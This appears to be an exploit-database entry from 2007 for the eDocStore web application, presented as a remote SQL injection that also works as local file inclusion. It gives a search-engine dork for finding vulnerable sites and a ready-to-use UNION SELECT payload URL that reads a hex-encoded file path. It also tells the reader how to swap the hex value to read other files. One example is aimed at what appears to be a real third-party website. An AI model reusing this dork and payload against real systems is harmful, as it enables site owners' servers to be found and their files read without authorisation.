eDocStore (doc.php doc_id) Remote SQL Injection Vulnerability

2007-06-25T00:00:00
ID 1337DAY-ID-1978
Type zdt
Reporter t0pP8uZz
Modified 2007-06-25T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =============================================================
eDocStore (doc.php doc_id) Remote SQL Injection Vulnerability
=============================================================



--==+================================================================================+==--
--==+            eDocStore Latest Versions Local File Inclusion Vulnerbilitys        +==--
--==+================================================================================+==--


AUTHOR: t0pP8uZz & xprog (good work xprog)

SCRIPT DOWNLOAD: N/A

DORK: intext:"Powered by eDocStore"


EXPLOITS:

EXPLOIT 1: http://www.server.com/essentials/minutes/doc.php?action=inline&doc_id=-1%20UNION%20ALL%20SELECT%200x2E2E2F696E6465782E706870,0x746578742F706C61696E,null,null,null,null,null


EXAMPLES:

EXAMPLE 1: http://www.nwal.org/essentials/minutes/doc.php?action=inline&doc_id=-1%20UNION%20ALL%20SELECT%200x2E2E2F696E6465782E706870,0x746578742F706C61696E,null,null,null,null,null

Note/Tip: The filename for the incluson has got to be hexed before you can include it.
Its only required to replace the first hex value before the ","


--==+================================================================================+==--
--==+            eDocStore Latest Versions Local File Inclusion Vulnerbilitys        +==--
--==+================================================================================+==--



#  0day.today [2018-04-11]  #